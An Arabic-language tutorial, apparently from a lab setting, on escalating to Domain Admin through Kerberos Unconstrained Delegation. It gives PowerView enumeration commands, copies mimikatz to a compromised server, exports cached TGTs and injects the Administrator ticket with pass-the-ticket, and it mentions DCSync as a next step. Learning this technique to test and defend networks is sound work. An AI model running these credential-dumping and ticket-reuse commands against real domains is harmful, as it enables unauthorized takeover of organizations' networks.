Domain Privilege Escalation - Unconstrained Delegation

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

مقدمة:

في هذي المقالة راح نشرح التكينك الخامس لي الـDomain Privilege Escalation وهو الـUnConstrained Delegation


قبل نبدا في تطبيق التكنيك خلونا نعرف ايش هو تكنيك الـUnConstrained Delegation؟

 

بعض الاجهزة تحتوي على Feature تسمى UnConstrained Delegation فكرة هذي الـFeature انه اي مستخدم يسجل دخول على الجهاز سواء كان عنده صلاحية  Domain Admin او غيره وحاول انه يسوي Access لسيرفس موجودة في جهاز اخر عن طريق الـKerberos راح تنحفظ ال TGT الخاصة فيه في الميموري 

السبب في حفظ الـTGT في الميموري انه وقت يتم طلب خدمة اخرى مايحتاج انه نسوي مصادقة لي الـTGT عن طريق الـKerberos لانه تم حفظها في الميموري اساسا

ف اذا المخترق وصل الى هذا الجهاز اللي يحتوي على Feature تسمى UnConstrained Delegation من الممكن يسحب الـTGT الموجودة في الميموري ويعيد استخدامها ويتمكن من الوصول الى Domian Controller طبعا كل هذا يعتمد على الـTGT الموجودة في الميموري هل تخص مستخدم موجود في قروب الـDomina Admins او لا او انه اساسا لا يوجد TGT في الميموري

الشرح:

اول شي راح نسوي Load لي اداة PowerView عن طريق هذا الامر:

 

Import-Module .\PowerView.ps1

عن طريق هذا الامر راح نشوف ايش الاجهزة اللي تحتوي على UnConstrained Delegation :

 

Get-NetComputer -Unconstrained

نلاحظ مع بعض ان الجهازين اللي هم dcorp-dc و dcorp-appsrv عندهم UnConstrained Delegation

طبعا اول جهاز هو الـDomain Controller  ف راح دائما تلاقي عليه UnConstrained Delegation ف مايهمنا

اللي يهمنا الجهاز  dcorp-appsrv طبعا عشان نطبق التكنيك لازم تكون مخترق هذا الجهاز وعندك صلاحية Local Administrator

ليش نحتاج صلاحية Local Administrator؟

عشان بنسحب الـTGT عن طريق اداة Mimikatz ف نحتاج لصلاحية Administrator على نفس الجهاز

ف انا عندي المستخدم appadmin عنده صلاحية Local Administrator على جهاز dcorp-appsrv زي ماهو موضح في الصورة القادمة

الان دخلنا للجهاز اللي يحتوي على  UnConstrained Delegation

الان راح انقل اداة mimikatz عن طريق هذا الامر:

$sess = New-PSSession -ComputerName dcorp-appsrv

Copy-Item -Path C:\AD\Tools\mimikatz_trunk\x64\mimikatz.exe -Destination C:\Users\Administrator\Desktop\ -ToSession $sess

الان راح نطلع على جميع الـTickets الموجودة في الميموري عن طريق هذا الامر:
 

.\mimikatz.exe "sekurlsa::tickets" "exit"

نلاحظ انه الـTGT الخاصة في الـ Administrator موجودة في الميموري


الان كل اللي علينا نسوي لها استخراج عن طريق هذا الامر:

 

.\mimikatz.exe "sekurlsa::tickets /export" "exit"

الان راح نرجع نحقنها في نفس الـSession الخاصة فينا عن طريق هذا الامر:
 

.\mimikatz.exe "kerberos::ptt [0;8d2043]-2-0-60a10000-Administrator@krbtgt-DOLLARCORP.MONEYCORP.LOCAL.kirbi" "exit"

الان يمديك تتصفح ملفات Domin Controller او تنفذ اوامر عليه او ممكن تنفذ dcsync attack وتاخذ الـNTLM Hash حق الـ Administrator 

وصلنا الى نهاية المقالة


اتمنى انها نالت على اعجابكم

شاكرلكم.